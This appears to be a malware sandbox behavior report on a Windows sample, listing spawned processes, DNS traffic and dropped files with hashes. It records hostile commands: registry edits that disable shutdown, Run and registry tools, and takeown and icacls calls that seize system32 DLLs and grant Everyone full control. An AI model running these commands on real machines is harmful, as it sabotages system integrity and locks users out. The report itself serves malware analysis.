"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 59.82.57.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp

Files

memory/744-0-0x00007FF601810000-0x00007FF6019B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

MD5 e6df76a3a72e94c96cc92b5f79a832bf
SHA1 b38ee7a185f3a76b5b8ef97e2a796aa10bd6b3c5
SHA256 b7b9267f8052fcc763733ce817159dc624f2950bada87bdd1e923ae2e8837641
SHA512 2dab56a9966f85ebf0b5d9c518454da85b9e977f201ab348c65f046b1df1a2ff6472e1b8d61456e8fc441f6be52870726d26658e3785b97bc54ee9105acddb80

C:\Windows\Debug\WIA\wiatrace.log

MD5 0fa6ffb2658d77b978316677015bd9f2
SHA1 3aa55790af369b228b7157ba09739117ea3573cc
SHA256 3495bcadac5180baf28a7daf0bc78241035195e4bd9401f2d95394fdae3d8e0a
SHA512 6b98625cd5da41955354efa50f5badaffe35726e9a357d45c9b9fc67695b948acf2b1e95c50e54f5e3efd0dd6859216276ccafc275d20f846a12506a587afc33

C:\Windows\Debug\WIA\wiatrace.log

MD5 76965baf0394871a68d30b647556bf96
SHA1 bd1534dee738b0681be444be56a98961b6d6f3a7
SHA256 19cc6014b3fc17f001ca87402b0c417bb0858ee8ed8269de123157a865988cf4
SHA512 7934c0c6c63da6c28de4fdc3102c3d366f0aa8a1b4000792756561cc3eb7be2f30917921cc0e9e58e565b55ab4ca1b7680baa5969f2154eecbdf6b6662f898f4

C:\Windows\Debug\WIA\wiatrace.log

MD5 3923d675828285fc71bdf2784446710f
SHA1 4dfb90410cecad64f3004168f330303d26dc373d
SHA256 32bed253221738a8ca3cbfd24e152c6d9b5019941395a64f7019448d2a3d358e
SHA512 fa431f4b8de967fc82b460267f124629b13e9df781907936e1384d208b9307c586ecd8be95e960a5619b5f7885380536164dcdeab602610f729bb7c61b5d9175

C:\Windows\Debug\WIA\wiatrace.log

MD5 c617d722b8a418606f586f63ad0e9010
SHA1 3a4968c7bd18402a5b2a4fb4ce39cec020dec30d
SHA256 3b3f8f025e50c653d100b939de89bbdf1be80639965acf6fed07d90cb2eeed5d
SHA512 4d069255f07cb603d7134feb22cef7cfcfb0771cfd0af6fe79c67c2fc5dad18ad7b9d421aa1dca209643a8e980d788731c5cd3a0b83614cc0f9d175b1b14e147

C:\Windows\Debug\WIA\wiatrace.log

MD5 4d2740fc102d731860b931d4017f9df6
SHA1 0ff80beaa61e791f131006648767c8f966745d34
SHA256 fea73a39605b7e48929683e7e7215511fa9420ad4b40069fd323a7f94fcaccea
SHA512 201aacc757090f2b65db489d56f225d9c638566e7aa81490c785870d2e8a5c6f76c6c1b3b71881bc7f762695ef97733610c754f3e24231e2051654673f104338

C:\Windows\Debug\WIA\wiatrace.log

MD5 cdb7497cb268fdd6340c171fa63d3324
SHA1 310169311e1878d5b3eed4643ec205846a24a9b8
SHA256 923110bea0f772d8757009dda3063a09f7a41fcdf1b71b2d2878a82ae9198593
SHA512 67f46af4a793c47b5af20548a9721108d746a38c91003cf96bfc7f64c9f032aed97559b6f9704dffb7ebf9652a9040823c95dd2ce131519768b7b7022156dac2

C:\Windows\Debug\WIA\wiatrace.log

MD5 4bd7fde243b219f9b7748710f71f285c
SHA1 761fbd33ccc28ddf1de451601822b131c765061c
SHA256 41fb2b445394bfd59040446191c564f23fcfe33b3328a0bd6e540bf837b430bc
SHA512 4ded2f148f4e5650b2ff612433a8a8dfed84e3ac5a757211aff71be5cede444d289811c860f87cf285c529a6bb4742a34f9b7a3d87eeefdb89a605729074c790

C:\Windows\Debug\WIA\wiatrace.log

MD5 df7fd0b6d37c8facb8c859fe54675bdf
SHA1 bdad9423a2a8863160ae0fe7475b6daa83a52f55
SHA256 8dc115a165d82c184ac58bf9cb9ce61bebd2ffb7282d869e0487da95cc43196d
SHA512 352182563e633008d793958343e1151fe3fd5c2bcb71ab21cd50da0753aaea7242cc12b978f7073f09de4d7726771e9a16ee27761283c780c66bf9000d8b648b

C:\Windows\Debug\WIA\wiatrace.log

MD5 442b5ddc39a996f047e0ec0faf9fa368
SHA1 62abd1c09afebf2adce60ed7b7ac469f493a5f52
SHA256 34d8f00ca65778f2a899f8a9a192caf3be59d9b15b356f67e0fffa873a23f7a3
SHA512 7d9dda9d0c001dd1108fc10f9097a7101efe0ace03af30dd1f7e6d3f6cf19d78d8c98f8f37973dc7cd4c309d5ef0df21e4c2d58c82761af2a06c741192fe81ff

C:\Windows\Debug\WIA\wiatrace.log

MD5 25e7f4e27d944b0bb61538a8b0234e64
SHA1 60ba2583f287a71cf8c11e28a3c72f790f403ed8
SHA256 f75e9454152d59881da8fee1f0aec5aa4c18e53dd65d1b072439bb0d3f31c7b5
SHA512 dde0768f6da6cb00993b5b56a657b9d1aa33046027e0d3c2ecbac8c16c8c3fb68e6fab3269fb655b41f3eb6eec7d2bb880989301acf50b32def07627b90ceed3

C:\Windows\Debug\WIA\wiatrace.log

MD5 3b08c8be73306fa06a132a1131e0f5df
SHA1 6ac8f6cb00b3d160c66f13a5deb3956cafd0a13b
SHA256 6ebb10c0991776b96dfe43d5cc299a57c9a502fab050acc96aacd730d4f01400
SHA512 213833c54ef449cf0c6ac4b9765ac61ae3c8cca65b381f360701a9ccfeced74f2bf5d66086fe96f36ae07283c28869ef04792133ca726f301b1514f4fe493868

C:\Windows\Debug\WIA\wiatrace.log

MD5 641149fcd398d8000bf1f45799d0cd36
SHA1 3c8db6f8c82ba9dda4667554cab861bf524b1c07
SHA256 0565d092723c4cd80915eafc969e2047dd53c26f3092fa620cf1e2fab25d0459
SHA512 ea1490db4a937c042c38c8e88ce87114334343d830fe36cd475f8e0c1e645fbc4468e4642f4c10d2b782c934ca4fcbb49c0b68833de4a66671a00cec37fc840c

C:\Windows\Debug\WIA\wiatrace.log

MD5 74588ac354c91d9aeb70a16ad4644714
SHA1 6cf4b0fa129ba16bb573c66dd82b1024f9220d73
SHA256 f502bed6b050240c909ad66ff3b96708473daeee36965d68918edf24125c65f2
SHA512 d0fc52b16e0f6b49051a02d616abeed942d7767f3776a8bd8102859df943caa02c33cdc8865c0997baf7357f3a6cc1c2da688a8d44c193c359a4788c741fbfcd

C:\Windows\Debug\WIA\wiatrace.log

MD5 1c8e4ab3ffdbc7f5e44bb891f78be25c
SHA1 128bd38d687894b80ab1fed679d21cb6a8d62060
SHA256 31831b6ec218c1f1552ba967dbce52b2657efd166d1715aa21e928625f666b6c
SHA512 fa713d663568cfb62c22ae7198ba69581a27cadeb42ac277778f60e53cc0f9fb93f0b5028ff62a4b0cde56d470f71632709e0f49d550cda844438f3fc4b4d64a

C:\Windows\Debug\WIA\wiatrace.log

MD5 bb574611b001d4b96026cf7c996a0829
SHA1 ee06ddab658a1e1c78777c6760b8dd93eacc7d09
SHA256 9eaf840d3ebe2c0677c0cab8de4fd5563f153f88801e46bce703469db2e66f59
SHA512 6eb22f345e9548cae2b2389bda39264a02e8ce87b39760a61e79cc9ded55886dd304f1e242f60c3d19d2dca6fc06cf1e6c92e645955e1b7bc06842d40ab11dce

C:\Windows\Debug\WIA\wiatrace.log

MD5 49a45cadafdfd729ae2853be67e08561
SHA1 cf726befc5d8d1c2f9315920ebd05e245a957e17
SHA256 424df9e3f78a3a10935dc3209671804b14dde41835b8a102c0ff8323364ce7ba
SHA512 28f1dd8fc7dc943ac5e195843d12370296d61a3c930e2ff534b68f85c673eb6332dc0a02a6768ab60892074d06a8f2d2f31bb242242d0ada427351713c06ad24

C:\Windows\Debug\WIA\wiatrace.log

MD5 d1c75ccdcd52656f23792b0027eb7043
SHA1 cbe8c92cc886534cdfc29acde43b3d9575cf94c8
SHA256 53ba86d5ed173684e2a5c68d6b2f997575fa4c7613aae10cab41dc077268c128
SHA512 0236d1c742937a0a9f0b275c0770fad107db7c2277b65fde1d00cbb89513973acf06f868b63a56ef00b1eb2d4bc891237c460e51433c23ad2c6cfa2432514cbd

C:\Windows\Debug\WIA\wiatrace.log

MD5 d9a7a94b8e4f5c8d2dfffbcc7cec8f62
SHA1 d6e28deb5cc1b68e8e7ee7af5dd01fdd7292bd28
SHA256 c85d61dd6acb47b808c4ec6045136cb2b9572dfcb7506347b317546d1a8ada92
SHA512 c48ef9eab32e13309ee2bd9ac889425c3499a03362a705e59665994f69329eee333421f876d1231ddf5181cbb0f075c120a90a86feb858567c22d770281e53b0

C:\Windows\Debug\WIA\wiatrace.log

MD5 d298ef1069150094826ba29f499311fd
SHA1 c0423840daedcdd56b5b2a509d9bcc6eb6d20b3d
SHA256 e920ff458f80eacc64fdd154458c23781220745b32bb1a487191d5fc4719117a
SHA512 e5ffa22f9ee3ed25a910810068c8021871225df5cbe03f33511f0c34d917361515641103a3b1fae3beacd09ea2b0ad1ed39498d73efc4a6bb45f4ba38a515069

C:\Windows\Debug\WIA\wiatrace.log

MD5 dd99861d52ae7c34de1912f934841aa7
SHA1 e3c578841de7d524ee798a0e1722bf0e13cff367
SHA256 0d045e3aad072586c4ae5da6d5ac50886828ec304f37e028f8d2c5e99482d00f
SHA512 f945e1786b140825f80538e55b3999f87729c9fbb326626f5dffe778ad8cdbb4b287afd09183217e8b4668e8af0ccf6086da8280d50834a3fb3da9440fc5e609

C:\Windows\Debug\WIA\wiatrace.log

MD5 02ce3ce9d0cbad9825875cceec7f2287
SHA1 8ae500bdaef76f2ea395dd173dd850200912e608
SHA256 be2955ff34c55feb4fc82679619b5849bb456ac8c09ed5b1ab2cef336fd9536e
SHA512 5fcefc3c44c9aafa0360f38bdf6b124af5c955b2518912a0dc65646ea12043a92445be4e6e9a8df9f9066977416c27e76a5db73c127e19840fcca52a97289817

C:\Windows\Debug\WIA\wiatrace.log

MD5 177d3df68bd69e3be004a8a34246b561
SHA1 8f68e81ff59fa14a39fea37186d316904fef223f
SHA256 28985117e846da8e8e1632d0a71f4d5e0be5bc49bc746c0eba37869443de7c66
SHA512 1af1306460734969172bc895634fab31cc70729c7f7884c3ae16c33ca484e70c1889038e994c5ce45b6c7d36d1393cb6bd85499c7f2371a23f4bef289597241c

C:\Windows\Debug\WIA\wiatrace.log

MD5 d70800c8d0149bf6eb0588a4a7d6fa3c
SHA1 ff15c60446809e32b1c1207066e055e787917e02
SHA256 04913a4834eea1d222e7664783ee8721397e1f1162a306c7a24b6cf7ca5ee3a3
SHA512 c17fec5c4e4594da93c3f0411eb41ef44a25a14826044cfae6f83b3f7d2dcce1e237aecdece49c32ba11785ddaaaaa4a99bab3066cefa1f2dd7a073794116f67

C:\Windows\Debug\WIA\wiatrace.log

MD5 e0ec65c0bb4358af5b86093808a6355b
SHA1 47ce08586fc6abd98957c0acb9cb67b5d15777ec
SHA256 06a24d7c0c4c3ecd1d33588c9c2802a1c680e956725dd9f1f8a3b19ca62dfb52
SHA512 272785588574f245d18cc59ee99acce17c6ea27a556592606b3c6fb057935ac8ec7131077ad24f20d92ad6f83b8212f90d50035f9786388913e5c7489dbf223a

C:\Windows\Debug\WIA\wiatrace.log

MD5 f56a80f371678cf5e91153178ae7f000
SHA1 b111d2000de63c8598b4a7cd0fc8aaaf549878a7
SHA256 5c51881472d7c24ea87739503cd88f933dd2aac01446a6f0f0c3958d156f1ae6
SHA512 a156a023d192a1d25709901168f86d9b57029b0d8043a76777002f0ac2739c26d443e5a9662c454fde7b9d17af4e0e25c8fa6796d2ae6936c4a4fbc6823b3046

C:\Windows\Debug\WIA\wiatrace.log

MD5 b23cdb1e34b32031821da7ffab2604ae
SHA1 871edc377a57ebbc6e44198cfdc0d7839807d582
SHA256 191d717b71a75da5475e9fb6b3517130846fda6cd8f0d3ffaf5f1fc8713eb8f5
SHA512 9af8762d389f7cb1fa5460b46993e6dbd1d7bec8fa15ca66d550a26150de31083c64c9684c0af5a9073a11020b86556714b539b81823130ff5bbb0fb126d1568

C:\Windows\Debug\WIA\wiatrace.log

MD5 535fcdc7c4bf71de8bb4a15412a07447
SHA1 6979e0d035b28af46894288e05ae9e7bcfebe46e
SHA256 b029bdcac4da615d636eea0d77d46d2b5fd8f3f0cb846e00ee8d064ad2a7cf18
SHA512 e045cfbd8aa7a68d32c4c3d53c77212da34f89b1f77a9fd0537b1e3be93ae30e667e85f042b40cc0dbb722ea86e16b785d0313c77d0deddae912110608b1bb6e

C:\Windows\Debug\WIA\wiatrace.log

MD5 bc7065ae2a1c98b78429e4e6c2f9fb81
SHA1 8c56300edbfd91799a376c9f6a4b33e94e7cb4de
SHA256 e4bd9fa821f21c5e94128e09456aff75f4e4f304986a789b89ccbf57994e6d93
SHA512 7705b5d28355d3f6a347a0a808b819e4164bd81f60554f294cabcb81296e168a98ceb79b2b6de9afec3f232bc1db8b07a79c05494e4d0207aec8e2e192f3b2bb

C:\Windows\Debug\WIA\wiatrace.log

MD5 54d8bbada7125aa873ee204f2f988390
SHA1 6a974229b837c140bc022f4f4104825283785714
SHA256 d30126a1dea1a3d8df9e134d90b8a21aace59338598ed7448e969dbed892057b
SHA512 5251550365dec25bfa9332aeef43c5ee701ae0446e95a5ac56ac5e9ee3572fb85359807cab4897933d78f15b45e5a1cf8d21f665d3df4dbf8f0e93e727960b65

C:\Windows\Debug\WIA\wiatrace.log

MD5 0638a767fb65ad09d677a7098bd51d5e
SHA1 ed323d563771cb653d644a41a12b5579e7041ca6
SHA256 ca757ad7ded613d62562d10120f074e6164e03b980afae87951fcb55e4d8acde
SHA512 73b50298309f5b76b786f6031e72d7c5c986119784bc6dd6a47780bc5c6ce151afcb78444f98e113306932bb9c7699739d790364f235b5f5b17b6c3889d7af0e

C:\Windows\Debug\WIA\wiatrace.log

MD5 5f8fcd317f4c96493b0ec087034d9afb
SHA1 cfdbafe35e3690a199cddf6a3d39de5ea350412e
SHA256 cf8598f4895cf398c27bff6fba6e4e53bcd456e569bcafbdf45ede76f47aabe2
SHA512 b673d25e6d1520b0529e9d8a305a54fb39b8d66f9d88bb5790d59a5675fa07a65bcefd86bbb53f84d38acf767597e23ae550cc90dcec53b50db152adb3404227

C:\Windows\Debug\WIA\wiatrace.log

MD5 9e86b801ca656f88cbb6a176f30ba44e
SHA1 0a2f87b39cd74e580629bdb8058686e38d81342b
SHA256 70f3b0dbd3a1b042464a7bef5b997da0cbb22ee48bdb8296da23eda5b90d4968
SHA512 cc7d71cb1b01dea221d454781243c2d24c2ee09294daa8e491cfd89b1c4e95ae2e9664953444d7ce97b7505aac1d8079cdffcf70d033ab25cde9479a3718e028

C:\Windows\Debug\WIA\wiatrace.log

MD5 48e3f7e354cf3b5b3ecd381fd7103c34
SHA1 c620fd3ee9b8d829aa7e736a38d40a6ff40ec7fe
SHA256 2e8017f6555e6e9bb53e451275b59a73b1ff000aa62e34266e53cb7e17f43c8d
SHA512 7038ae7445e361f945f61a612c2eb2f7d48424ea8e2ee927b40eaa8f5271155c8149e9e7fbf780b6c40a3ff88193b395761130cfca27a43cce1560875d0f3451

C:\Windows\Debug\WIA\wiatrace.log

MD5 d3f2802c50421dad07eb5f0ecb0f7b37
SHA1 58df68c9945ba0f99240731dfdf3cb1316736ed6
SHA256 223247232afb3d5ac7ec2df7295b739e6f61151b594ccb18c4dbfa2f50b5cd71
SHA512 87fb7ff4bbc8ead079f27fb2f5f61cde1cdc7911bbcc78be1059e5cfd8051d736384f0eb36713da364bb7ed8a7bde057e7ff76eb2e94dc2542c71999effa8d9c

C:\Windows\Debug\WIA\wiatrace.log

MD5 88ed6933917ba67312a8f9498a679b07
SHA1 d01ec061e5c31f1c96e737a550ef8176ee3292a9
SHA256 8e65534a47b79b022cc451b236b5e114741bca6654ddd1f36858cc33817427b2
SHA512 c10c5fbc59dd50df476afe8977a4651b949d9931160239bd00f0a0830473fa5174124c3cafcb90c6049898f2674f341c69658bb80d5be76e8dc9ee660ab30532

memory/744-47-0x00007FF601810000-0x00007FF6019B0000-memory.dmp

C:\Windows\Debug\WIA\wiatrace.log

MD5 02ce7b33354508d2a03d187160a5b59a
SHA1 f8a95492856779c66d71d32f156055116cfed935
SHA256 a13512cb8044907f46d7a0ced25be14e31bdee0bd51a24ab9f9f3f106bcea73b
SHA512 4f139abbd660a8c250ef6981035cf54366ac4379acebade14938394e3887748238ef03bc5fe4d3875856fca256ce6b13d1961f30a3dd7cc05e7355e93606b1a6